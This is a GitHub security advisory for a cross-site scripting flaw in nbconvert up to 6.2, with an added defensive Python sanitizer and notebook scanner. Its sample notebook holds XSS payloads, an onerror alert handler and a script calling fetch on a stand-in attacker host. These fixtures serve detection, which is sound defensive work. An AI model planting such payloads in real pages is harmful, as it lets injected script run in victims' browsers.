GHSA-9jmq-rx5f-8jwq: nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths

High severity GitHub Reviewed Published Aug 10, 2022 in jupyter/nbconvert • Updated Aug 10, 2022


Package

nbconvert (pip)

Affected versions

<= 6.2

Patched versions

6.3

Description

The GitHub Security Lab discovered sixteen ways to exploit a cross-site scripting vulnerability in nbconvert. When nbconvert is used to generate an HTML version of a notebook that an untrusted user controls, the notebook's contents can inject arbitrary HTML into the generated document. If that HTML is then served by a web server (e.g. nbviewer), the injected markup runs in the browser of anyone who views the page, i.e. cross-site scripting (XSS). Upgrade to nbconvert 6.3 or later; services that publish converted notebooks should also review the linked nbviewer advisory.
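The description above says where the injected HTML comes from (a user-controllable notebook) and where it does damage (a server that serves the converted HTML). The following is an added example, not nbconvert's code and not the advisory's proof of concept. It assumes, as nbconvert's HTML exporter behaves, that markdown cells, raw cells and text/html outputs are passed through as raw HTML; the allowlist filter is a stand-in for the sanitization a publishing service should apply to each rendered fragment, and the scanner shows which fields of an attacker-supplied .ipynb would carry active content. The sample notebook, the tag and attribute allowlist and the URL policy are constructed for the example.

```python
"""Find and strip attacker-controlled HTML in a Jupyter notebook before serving it.

Added example, not nbconvert's code or the advisory's proof of concept. It assumes,
as nbconvert's HTML exporter behaves, that markdown cells, raw cells and text/html
outputs become raw HTML in the exported page: the route by which an untrusted
.ipynb carries XSS into a site such as nbviewer.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"a", "b", "blockquote", "br", "code", "em", "h1", "h2", "h3", "h4",
                "hr", "i", "img", "li", "ol", "p", "pre", "strong", "table", "td", "th", "tr", "ul"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
VOID_TAGS = {"br", "hr", "img"}
# Elements whose content is dropped together with the tag.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math",
                     "template", "noscript"}
# Conservative URL policy (assumed): absolute http(s)/mailto, fragment or root-relative only.
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "#", "/")


class AllowlistSanitizer(HTMLParser):
    """Rebuild input from allowlisted tags/attributes; record removals in .dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # comments/decls are discarded
        self.out, self.dropped = [], []
        self._skip = 0  # nesting depth inside a DROP_WITH_CONTENT element

    @staticmethod
    def _safe_url(value):
        # Drop whitespace/control chars that browsers ignore ("java\tscript:").
        v = "".join(c for c in (value or "") if c.isprintable() and not c.isspace())
        return v.lower().startswith(SAFE_URL_PREFIXES)

    def handle_starttag(self, tag, attrs):
        if self._skip:
            self._skip += int(tag in DROP_WITH_CONTENT)
            return
        if tag in DROP_WITH_CONTENT or tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")
            self._skip = int(tag in DROP_WITH_CONTENT)  # unknown tags keep their text
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                self.dropped.append(f"{tag}@{name}")  # event handlers, style, ...
            elif name in ("href", "src") and not self._safe_url(value):
                self.dropped.append(f"{tag}@{name}")  # javascript:, data:, ...
            else:
                kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip:
            self._skip -= int(tag in DROP_WITH_CONTENT)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))  # re-escape decoded text


def sanitize_html(fragment):
    """Return (clean_fragment, dropped_items) for one rendered HTML fragment."""
    p = AllowlistSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.dropped


def scan_notebook(nb):
    """Return [(cell_index, field, dropped_items)] for every HTML-bearing field the
    allowlist would alter; an empty list means the notebook is clean."""
    def text(v):  # nbformat stores multi-line strings as str or list of lines
        return "".join(v) if isinstance(v, list) else (v or "")
    findings = []
    for i, cell in enumerate(nb.get("cells", [])):
        if cell.get("cell_type") in ("markdown", "raw"):
            dropped = sanitize_html(text(cell.get("source")))[1]
            if dropped:
                findings.append((i, "source", dropped))
        for j, out in enumerate(cell.get("outputs", [])):
            html = out.get("data", {}).get("text/html")
            if html is not None and (dropped := sanitize_html(text(html))[1]):
                findings.append((i, f"outputs[{j}].data[text/html]", dropped))
    return findings


# Constructed sample (not from the advisory): a markdown cell carrying an event
# handler, a code cell whose HTML output embeds a script, and one clean cell.
SAMPLE_NOTEBOOK = {"nbformat": 4, "nbformat_minor": 5, "metadata": {}, "cells": [
    {"cell_type": "markdown", "metadata": {},
     "source": ["# Report\n", '<img src="https://example.org/x.png" onerror="alert(1)">']},
    {"cell_type": "code", "metadata": {}, "execution_count": 1, "source": "x", "outputs": [
        {"output_type": "display_data", "metadata": {}, "data": {"text/html": [
            "<b>ok</b>", "<script>fetch('https://attacker.example')</script>"]}}]},
    {"cell_type": "code", "metadata": {}, "execution_count": 2, "source": "y",
     "outputs": [{"output_type": "stream", "name": "stdout", "text": "plain\n"}]}]}
```

`scan_notebook(SAMPLE_NOTEBOOK)` reports the `onerror` handler in cell 0 and the `<script>` in cell 1's HTML output, and nothing for the plain stream output. In a publishing pipeline the filter belongs on each fragment the exporter renders (markdown turned into HTML, and every text/html output), not on the notebook source, because markdown syntax such as a link to a `javascript:` URL only becomes HTML after rendering. Rejecting a notebook that produces any finding is the conservative choice. None of this replaces the fix the advisory points to: run nbconvert 6.3 or later (nbconvert also ships a `SanitizeHTML` preprocessor for the same purpose).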

References

  • GHSA-9jmq-rx5f-8jwq
  • https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm

SylvainCorlay published the maintainer security advisory on Aug 10, 2022

Severity

High

Weaknesses

CWE-79

CVE ID

CVE-2021-32862

GHSA ID

GHSA-9jmq-rx5f-8jwq

Source code

jupyter/nbconvert

Credits

  • pwntester


Related news

CVE-2021-32862: Multiple sanitization/validation issues